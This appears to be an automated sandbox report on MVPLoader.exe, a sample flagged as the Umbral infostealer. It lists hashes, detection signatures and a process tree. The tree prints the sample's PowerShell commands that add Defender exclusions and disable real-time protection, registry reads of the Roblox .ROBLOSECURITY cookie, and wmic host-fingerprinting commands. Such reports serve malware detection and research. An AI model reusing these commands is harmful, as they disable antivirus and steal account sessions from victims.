Analysis
-
max time kernel
33s -
max time network
34s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
23-12-2024 20:05
General
-
Target
MVPLoader.exe
-
Size
296KB
-
MD5
a003b413af774f804d4636f1c548432d
-
SHA1
1278d0575f8f693f525b0c9382b9eb6c5a01f1f7
-
SHA256
701bcfb85c1c91cba00d1ab6642071739621b886e79255d874dd0def2adbe6b6
-
SHA512
9abbc1dae91f85e8565905cb78e7266e7dfa1a6c98e3c80dd2ad9e6d6fd955bd28b7b908c802c74a8e6960b98e85c4d040aa7e01adc0babb841634c339db79d6
-
SSDEEP
6144:9loZMCrIkd8g+EtXHkv/iD4uDwGPlO2Z0c1niinghb8e1mbietLjth6t0stcOtKc:foZZL+EP8uDwGPlO2Z0c1niingtK
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/3928-1-0x0000026A099F0000-0x0000026A09A40000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2500 powershell.exe 5060 powershell.exe 4408 powershell.exe 1428 powershell.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 22 discord.com 23 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2088 wmic.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
pid Process 2500 powershell.exe 2500 powershell.exe 1428 powershell.exe 1428 powershell.exe 5060 powershell.exe 5060 powershell.exe 972 powershell.exe 972 powershell.exe 60 wmic.exe 60 wmic.exe 60 wmic.exe 60 wmic.exe 2960 wmic.exe 2960 wmic.exe 2960 wmic.exe 2960 wmic.exe 1016 wmic.exe 1016 wmic.exe 1016 wmic.exe 1016 wmic.exe 4408 powershell.exe 4408 powershell.exe 2088 wmic.exe 2088 wmic.exe 2088 wmic.exe 2088 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3928 MVPLoader.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeIncreaseQuotaPrivilege 2500 powershell.exe Token: SeSecurityPrivilege 2500 powershell.exe Token: SeTakeOwnershipPrivilege 2500 powershell.exe Token: SeLoadDriverPrivilege 2500 powershell.exe Token: SeSystemProfilePrivilege 2500 powershell.exe Token: SeSystemtimePrivilege 2500 powershell.exe Token: SeProfSingleProcessPrivilege 2500 powershell.exe Token: SeIncBasePriorityPrivilege 2500 powershell.exe Token: SeCreatePagefilePrivilege 2500 powershell.exe Token: SeBackupPrivilege 2500 powershell.exe Token: SeRestorePrivilege 2500 powershell.exe Token: SeShutdownPrivilege 2500 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeSystemEnvironmentPrivilege 2500 powershell.exe Token: SeRemoteShutdownPrivilege 2500 powershell.exe Token: SeUndockPrivilege 2500 powershell.exe Token: SeManageVolumePrivilege 2500 powershell.exe Token: 33 2500 powershell.exe Token: 34 2500 powershell.exe Token: 35 2500 powershell.exe Token: 36 2500 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 5060 powershell.exe Token: SeDebugPrivilege 972 powershell.exe Token: SeIncreaseQuotaPrivilege 60 wmic.exe Token: SeSecurityPrivilege 60 wmic.exe Token: SeTakeOwnershipPrivilege 60 wmic.exe Token: SeLoadDriverPrivilege 60 wmic.exe Token: SeSystemProfilePrivilege 60 wmic.exe Token: SeSystemtimePrivilege 60 wmic.exe Token: SeProfSingleProcessPrivilege 60 wmic.exe Token: SeIncBasePriorityPrivilege 60 wmic.exe Token: SeCreatePagefilePrivilege 60 wmic.exe Token: SeBackupPrivilege 60 wmic.exe Token: SeRestorePrivilege 60 wmic.exe Token: SeShutdownPrivilege 60 wmic.exe Token: SeDebugPrivilege 60 wmic.exe Token: SeSystemEnvironmentPrivilege 60 wmic.exe Token: SeRemoteShutdownPrivilege 60 wmic.exe Token: SeUndockPrivilege 60 wmic.exe Token: SeManageVolumePrivilege 60 wmic.exe Token: 33 60 wmic.exe Token: 34 60 wmic.exe Token: 35 60 wmic.exe Token: 36 60 wmic.exe Token: SeIncreaseQuotaPrivilege 60 wmic.exe Token: SeSecurityPrivilege 60 wmic.exe Token: SeTakeOwnershipPrivilege 60 wmic.exe Token: SeLoadDriverPrivilege 60 wmic.exe Token: SeSystemProfilePrivilege 60 wmic.exe Token: SeSystemtimePrivilege 60 wmic.exe Token: SeProfSingleProcessPrivilege 60 wmic.exe Token: SeIncBasePriorityPrivilege 60 wmic.exe Token: SeCreatePagefilePrivilege 60 wmic.exe Token: SeBackupPrivilege 60 wmic.exe Token: SeRestorePrivilege 60 wmic.exe Token: SeShutdownPrivilege 60 wmic.exe Token: SeDebugPrivilege 60 wmic.exe Token: SeSystemEnvironmentPrivilege 60 wmic.exe Token: SeRemoteShutdownPrivilege 60 wmic.exe Token: SeUndockPrivilege 60 wmic.exe Token: SeManageVolumePrivilege 60 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3928 wrote to memory of 2500 3928 MVPLoader.exe 83 PID 3928 wrote to memory of 2500 3928 MVPLoader.exe 83 PID 3928 wrote to memory of 1428 3928 MVPLoader.exe 87 PID 3928 wrote to memory of 1428 3928 MVPLoader.exe 87 PID 3928 wrote to memory of 5060 3928 MVPLoader.exe 89 PID 3928 wrote to memory of 5060 3928 MVPLoader.exe 89 PID 3928 wrote to memory of 972 3928 MVPLoader.exe 91 PID 3928 wrote to memory of 972 3928 MVPLoader.exe 91 PID 3928 wrote to memory of 60 3928 MVPLoader.exe 95 PID 3928 wrote to memory of 60 3928 MVPLoader.exe 95 PID 3928 wrote to memory of 2960 3928 MVPLoader.exe 98 PID 3928 wrote to memory of 2960 3928 MVPLoader.exe 98 PID 3928 wrote to memory of 1016 3928 MVPLoader.exe 101 PID 3928 wrote to memory of 1016 3928 MVPLoader.exe 101 PID 3928 wrote to memory of 4408 3928 MVPLoader.exe 103 PID 3928 wrote to memory of 4408 3928 MVPLoader.exe 103 PID 3928 wrote to memory of 2088 3928 MVPLoader.exe 105 PID 3928 wrote to memory of 2088 3928 MVPLoader.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\MVPLoader.exe"C:\Users\Admin\AppData\Local\Temp\MVPLoader.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MVPLoader.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2960
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4408
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:2088
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
948B
MD55e946827b10b3a1aae14763a4d3cc6e6
SHA11dd706b1ad0f21efe81138e90905eca5e799117f
SHA2566d20222f0bd5cfebddd7f5ed0aa73c592f796d0c67748dd4e12ecba9750e47ce
SHA51227c6f0483c0f5507c3cf31d06e84b72ee6db82a838a48477b1cdb7c6739eba8541a66f7eb4f39fdc032ab5649027f3c81621304bd5ac8ecef1f93734c6d561b7
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD58d3f899749d979669d905dc62fb68945
SHA108b8fa5acce95ea6dfdf5cc74284da16ec2e3c87
SHA25613c886869fd9ed133c72393dc0b0d62bf1fe18ed92bcdefd4aa875509dc10e3b
SHA512c1f7cde1ad5a24eaf10dfba78f8b4f624d980f69e6ae6f06045b6fd8bdd11eb84972c2369b33c9b59a198d30c9e043f8db1dfec80564c6b1985c03e718f4c217
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82